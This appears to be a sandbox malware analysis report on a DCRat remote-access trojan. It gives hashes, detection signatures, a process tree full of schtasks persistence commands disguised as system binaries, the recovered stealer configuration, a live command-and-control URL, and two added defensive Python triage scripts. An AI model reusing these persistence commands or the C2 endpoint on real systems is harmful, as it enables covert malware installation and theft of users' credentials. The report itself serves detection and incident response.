Windows Analysis Report
rWjaZEKha8.exe

Overview

General Information

Sample name: rWjaZEKha8.exe (renamed because the original name is a hash value)
Original sample name: 5D579285E5EFDF6DE25DA8D83D7AA9BE.exe
Analysis ID: 1581448
MD5: 5d579285e5efdf6de25da8d83d7aa9be
SHA1: 09c112d891262a4967f5fd7e864b4cc040297858
SHA256: c03fa0ee0fe28bde170f78b55cfa13a61dde423d9f66e3fbd8bb53dd3c0c1fb4
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops PE files to the user root directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • rWjaZEKha8.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\rWjaZEKha8.exe" MD5: 5D579285E5EFDF6DE25DA8D83D7AA9BE)
    • wscript.exe (PID: 7716 cmdline: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c ""C:\bridgehyperperfdhcp\NwRTUiiV6D2Ys0Trm6fATcEH4s25r.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • intoDhcp.exe (PID: 7860 cmdline: "C:\bridgehyperperfdhcp\intoDhcp.exe" MD5: 889D38A4230664BEFDBB3D1528E08DF2)
          • schtasks.exe (PID: 7920 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7952 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8000 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8020 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8036 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8104 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 9 /tr "'C:\Users\user\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8160 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7248 cmdline: schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7284 cmdline: schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7364 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 8 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7420 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7404 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 12 /tr "'C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7472 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3340 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3448 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2872 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1216 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 564 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5856 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5804 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7596 cmdline: schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2316 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7336 cmdline: schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7492 cmdline: schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 5320 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Idle.exe (PID: 8136 cmdline: "C:\Program Files\Windows Portable Devices\Idle.exe" MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • Idle.exe (PID: 8168 cmdline: "C:\Program Files\Windows Portable Devices\Idle.exe" MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • OjTEkrTlLyhdt.exe (PID: 7232 cmdline: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • OjTEkrTlLyhdt.exe (PID: 3060 cmdline: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe MD5: 889D38A4230664BEFDBB3D1528E08DF2)
  • cleanup
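The process tree above shows one dropper (intoDhcp.exe) registering the same few binaries under several task names, on an every-few-minutes schedule and again at logon with /rl HIGHEST, using the names of Windows system processes (dasHost.exe, Idle.exe, upfc.exe, TextInputHost.exe) in directories where those binaries never live. The script below is an added example written for this page, not part of the Joe Sandbox report: it parses schtasks /create command lines of that shape and flags the same indicators the report's signatures describe. The EXPECTED_DIRS table and the benign control line are assumptions made for the example.

```python
"""Persistence triage for schtasks /create command lines (added example)."""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Command lines copied from the process tree above, plus one constructed
# benign control (a vendor updater in its own directory) as the last entry.
SAMPLE_CMDLINES = r"""
schtasks.exe /create /tn "OjTEkrTlLyhdtO" /sc MINUTE /mo 7 /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /f
schtasks.exe /create /tn "OjTEkrTlLyhdt" /sc ONLOGON /tr "'C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /f
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Idle.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\TextInputHost.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\upfc.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\dasHost.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "VendorUpdate" /sc DAILY /tr "C:\Program Files\Vendor\update.exe" /f
""".strip().splitlines()

# Directories in which a binary with this name is legitimately found.
# Assumed for the example: derive the real table from a clean reference host.
EXPECTED_DIRS = {
    "dashost.exe": (r"c:\windows\system32",),
    "upfc.exe": (r"c:\windows\system32",),
    "textinputhost.exe": (r"c:\windows\systemapps",),
    "idle.exe": (),  # "System Idle Process" has no image on disk
}

_TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_schtasks(cmdline):
    """Return {option: value} for a `schtasks /create` line, else None.

    Options without an argument (/f) map to True; quoted values lose both
    the outer double quotes and the inner single quotes seen above.
    """
    tokens = _TOKEN.findall(cmdline)
    if len(tokens) < 2 or tokens[1].lower() != "/create":
        return None
    opts, i = {}, 2
    while i < len(tokens):
        opt = tokens[i].lower()
        has_arg = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
        opts[opt] = tokens[i + 1].strip('"').strip("'") if has_arg else True
        i += 2 if has_arg else 1
    return opts


def in_expected_dir(path):
    """False when a reused system-binary name sits outside its home dir."""
    p = PureWindowsPath(path)
    homes = EXPECTED_DIRS.get(p.name.lower())
    if homes is None:
        return True  # not a name we track
    parent = str(p.parent).lower()
    return any(parent.startswith(h) for h in homes)


def triage(cmdlines):
    """Flag task registrations showing the patterns seen in this report."""
    tasks = [t for t in map(parse_schtasks, cmdlines) if t and "/tr" in t]
    per_target = Counter(t["/tr"].lower() for t in tasks)
    findings = []
    for t in tasks:
        target, reasons = t["/tr"], []
        if not in_expected_dir(target):
            reasons.append("system process name outside its expected directory")
        if str(t.get("/rl", "")).upper() == "HIGHEST":
            reasons.append("runs with highest available privileges (/rl HIGHEST)")
        if str(t.get("/sc", "")).upper() == "MINUTE":
            reasons.append("re-launched every %s minute(s)" % t.get("/mo", "?"))
        if per_target[target.lower()] > 1:
            reasons.append("%d tasks point at the same binary" % per_target[target.lower()])
        if reasons:
            findings.append({"task": t.get("/tn"), "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print("%s -> %s" % (f["task"], f["target"]))
        for r in f["reasons"]:
            print("    " + r)
```

Feed it the command lines from Sysmon event 1 or 4688 telemetry filtered on schtasks.exe; the per-target count is what separates a dropper re-registering one binary under many task names from an installer that creates a single task.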

Malware Configuration

DCRat configuration recovered from process memory by the configuration extractor (the memory dump it came from is listed in the AV Detection section):

{
  "SCRT": "{\"1\":\"&\",\"h\":\"-\",\"S\":\"`\",\"i\":\"|\",\"W\":\"*\",\"A\":\".\",\"0\":\" \",\"C\":\"_\",\"d\":\">\",\"J\":\";\",\"M\":\")\",\"5\":\"~\",\"6\":\"^\",\"2\":\"(\",\"I\":\",\",\"o\":\"<\",\"z\":\"$\",\"L\":\"@\",\"k\":\"!\",\"H\":\"%\",\"P\":\"#\"}",
  "PCRT": "{\"Q\":\"^\",\"0\":\"&\",\"Z\":\"~\",\"m\":\"`\",\"R\":\">\",\"v\":\"<\",\"F\":\".\",\"U\":\" \",\"k\":\"%\",\"3\":\")\",\"H\":\"$\",\"d\":\"@\",\"B\":\"(\",\"M\":\"|\",\"Y\":\"_\",\"V\":\";\",\"y\":\"#\",\"T\":\"!\",\"r\":\",\",\"o\":\"*\",\"W\":\"-\"}",
  "TAG": "",
  "MUTEX": "DCR_MUTEX-IuDxRkiH9WGLnOdm8OhB",
  "LDTM": false,
  "DBG": false,
  "SST": 5,
  "SMST": 2,
  "BCS": 0,
  "AUR": 1,
  "ASCFG": {
    "savebrowsersdatatosinglefile": false,
    "ignorepartiallyemptydata": false,
    "cookies": true,
    "passwords": true,
    "forms": true,
    "cc": true,
    "history": false,
    "telegram": true,
    "steam": true,
    "discord": true,
    "filezilla": true,
    "screenshot": true,
    "clipboard": true,
    "sysinfo": true,
    "searchpath": "%UsersFolder% - Fast"
  },
  "AS": true,
  "ASO": false,
  "AD": false
}
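The configuration above is a JSON document whose SCRT and PCRT members are themselves JSON documents serialized as strings, each a one-to-one map from alphanumeric characters to punctuation, while ASCFG lists which stealer modules are switched on. The helper below is an added example, not code from the report or from DCRat: it unpacks the nested tables, pulls out the indicators a responder hunts on (mutex, enabled modules, search path) and checks that each table is invertible. Treating the tables as plain single-character substitution, and the sample string run through them, are assumptions made for the example; the report does not say how the agent applies them.

```python
"""Triage of the DCRat configuration shown above (added example)."""
import json

# Configuration string exactly as the report's extractor printed it above
# (copied from this page, not constructed); split only for line length.
RAW_CONFIG = (
    r'{"SCRT": "{\"1\":\"&\",\"h\":\"-\",\"S\":\"`\",\"i\":\"|\",\"W\":\"*\",\"A\":\".\",'
    r'\"0\":\" \",\"C\":\"_\",\"d\":\">\",\"J\":\";\",\"M\":\")\",\"5\":\"~\",\"6\":\"^\",'
    r'\"2\":\"(\",\"I\":\",\",\"o\":\"<\",\"z\":\"$\",\"L\":\"@\",\"k\":\"!\",\"H\":\"%\",\"P\":\"#\"}", '
    r'"PCRT": "{\"Q\":\"^\",\"0\":\"&\",\"Z\":\"~\",\"m\":\"`\",\"R\":\">\",\"v\":\"<\",\"F\":\".\",'
    r'\"U\":\" \",\"k\":\"%\",\"3\":\")\",\"H\":\"$\",\"d\":\"@\",\"B\":\"(\",\"M\":\"|\",\"Y\":\"_\",'
    r'\"V\":\";\",\"y\":\"#\",\"T\":\"!\",\"r\":\",\",\"o\":\"*\",\"W\":\"-\"}", '
    r'"TAG": "", "MUTEX": "DCR_MUTEX-IuDxRkiH9WGLnOdm8OhB", "LDTM": false, "DBG": false, '
    r'"SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, '
    r'"ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, '
    r'"cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, '
    r'"telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, '
    r'"clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, '
    r'"AS": true, "ASO": false, "AD": false}'
)


def load_config(raw):
    """Parse the outer document and the two JSON-in-a-string tables."""
    cfg = json.loads(raw)
    for key in ("SCRT", "PCRT"):
        cfg[key] = json.loads(cfg[key])
    return cfg


def invert_table(table):
    """Invert a substitution table; refuse one that is not a bijection."""
    inverse = {v: k for k, v in table.items()}
    if len(inverse) != len(table):
        raise ValueError("substitution table is not one-to-one")
    return inverse


def substitute(text, table):
    """Apply a table as single-character substitution (assumed usage)."""
    return "".join(table.get(ch, ch) for ch in text)


def enabled_stealer_modules(cfg):
    """Names of ASCFG switches that are on (cookies, passwords, ...)."""
    return sorted(k for k, v in cfg["ASCFG"].items() if v is True)


def summarize(cfg):
    """The fields worth copying into an incident record."""
    return {
        "mutex": cfg["MUTEX"],
        "stealer_enabled": cfg["AS"],
        "stealer_modules": enabled_stealer_modules(cfg),
        "searchpath": cfg["ASCFG"]["searchpath"],
        "tables_invertible": all(
            invert_table(cfg[k]) is not None for k in ("SCRT", "PCRT")),
    }


if __name__ == "__main__":
    cfg = load_config(RAW_CONFIG)
    print(json.dumps(summarize(cfg), indent=2))
    # Constructed sample: forward substitution and its inverse round-trip.
    encoded = substitute("abc1h0", cfg["SCRT"])
    print(repr(encoded), repr(substitute(encoded, invert_table(cfg["SCRT"]))))
```

The mutex name is the cheapest host-wide indicator here: a running DCRat agent must hold it, so it can be checked on every endpoint without touching the dropped files.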

Yara Overview

Source | Rule | Description | Author
00000004.00000002.1750999526.0000000003622000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000015.00000002.1857787065.0000000002611000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000004.00000002.1750999526.00000000032D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000012.00000002.1838389619.0000000002A61000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000017.00000002.1838727941.00000000028F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
(5 of 7 matches shown)

Sigma Overview

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\bridgehyperperfdhcp\intoDhcp.exe, ProcessId: 7860, TargetFilename: C:\Program Files (x86)\microsoft office\dasHost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe", CommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\rWjaZEKha8.exe", ParentImage: C:\Users\user\Desktop\rWjaZEKha8.exe, ParentProcessId: 7676, ParentProcessName: rWjaZEKha8.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe", ProcessId: 7716, ProcessName: wscript.exe

Suricata Overview

No Suricata rule has matched


AV Detection

Source: rWjaZEKha8.exe | Avira: detected
Source: http://a1067345.xsph.ru/ | Avira URL Cloud: Label: malware
Source: http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839eee19f6966bfbabe4900b624161e8=2eaac4e162c4e7f7852177bf13b5969e&4942500b55a6a4fa595356f0cbfe4b94=QYzQ2MwITO0gzMlFTMxI2MjdTYkljYmJTOjZGO1I2YxYTMidjYhRGO&mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ | Avira URL Cloud: Label: malware
Source: http://a1067345.xsph.ru | Avira URL Cloud: Label: malware
Source: http://a1067345.xsph.ru/L1nc0In.php?mkn6LdkjNAa3q=3Nmq&cUBN7q5c487P5k4KRJAd=akB0oT9Zs0Tfb7BlWpQ&839e | Avira URL Cloud: Label: malware
Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\GoElC7XtGN.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Microsoft Office\dasHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\bridgehyperperfdhcp\6tAgwycUZiOpR.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Portable Devices\upfc.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Portable Devices\Idle.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: 00000004.00000002.1752275310.00000000132DF000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"SCRT": "{\"1\":\"&\",\"h\":\"-\",\"S\":\"`\",\"i\":\"|\",\"W\":\"*\",\"A\":\".\",\"0\":\" \",\"C\":\"_\",\"d\":\">\",\"J\":\";\",\"M\":\")\",\"5\":\"~\",\"6\":\"^\",\"2\":\"(\",\"I\":\",\",\"o\":\"<\",\"z\":\"$\",\"L\":\"@\",\"k\":\"!\",\"H\":\"%\",\"P\":\"#\"}", "PCRT": "{\"Q\":\"^\",\"0\":\"&\",\"Z\":\"~\",\"m\":\"`\",\"R\":\">\",\"v\":\"<\",\"F\":\".\",\"U\":\" \",\"k\":\"%\",\"3\":\")\",\"H\":\"$\",\"d\":\"@\",\"B\":\"(\",\"M\":\"|\",\"Y\":\"_\",\"V\":\";\",\"y\":\"#\",\"T\":\"!\",\"r\":\",\",\"o\":\"*\",\"W\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-IuDxRkiH9WGLnOdm8OhB", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}
Source: C:\Program Files (x86)\Microsoft Office\dasHost.exe | ReversingLabs: Detection: 76%
Source: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe | ReversingLabs: Detection: 76%
Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | ReversingLabs: Detection: 76%
Source: C:\Program Files\Windows Mail\OjTEkrTlLyhdt.exe | ReversingLabs: Detection: 76%
Source: C:\Program Files\Windows Portable Devices\Idle.exe | ReversingLabs: Detection: 76%
Source: C:\Program Files\Windows Portable Devices\OjTEkrTlLyhdt.exe | ReversingLabs: Detection: 76%
Source: C:\Program Files\Windows Portable Devices\upfc.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\3D Objects\OjTEkrTlLyhdt.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\OjTEkrTlLyhdt.exe | ReversingLabs: Detection: 76%
Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe | ReversingLabs: Detection: 76%
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | ReversingLabs: Detection: 76%
Source: rWjaZEKha8.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files\MSBuild\OjTEkrTlLyhdt.exe | Joe Sandbox ML: detected
Source: C:\bridgehyperperfdhcp\intoDhcp.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\dasHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\TextInputHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Portable Devices\upfc.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Portable Devices\Idle.exe | Joe Sandbox ML: detected
Source: rWjaZEKha8.exe | Joe Sandbox ML: detected
Source: rWjaZEKha8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
